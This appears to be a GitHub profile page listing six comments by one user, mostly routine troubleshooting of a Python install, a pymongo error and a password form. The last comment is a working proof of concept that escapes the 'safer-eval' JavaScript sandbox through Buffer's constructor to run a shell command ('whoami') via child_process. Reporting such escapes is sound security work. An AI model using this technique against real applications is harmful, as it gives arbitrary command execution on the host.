Anirudh Anand

Results 6 comments of Anirudh Anand

The problem seems to exist because you haven't installed python twitter module. Can you try re-running `python install.py` and see if the installation is completing without any errors ? You...

`pymongo.errors.InvalidOperation: No operations to execute` probably means the data variable you are trying to push into DB is empty so there is no operation to execute. You can try commenting...

That would be a great option since we have a good number of contributions.

That is a normal behaviour right ? How come it becomes a bug ? If you correctly enter passwords in both sections, everything works perfect.

Using Buffer: ```javascript var saferEval = require("safer-eval"); var code = "Buffer.of.constructor('return process')().mainModule.require('child_process').execSync('whoami').toString();"; console.log(saferEval(code)); ```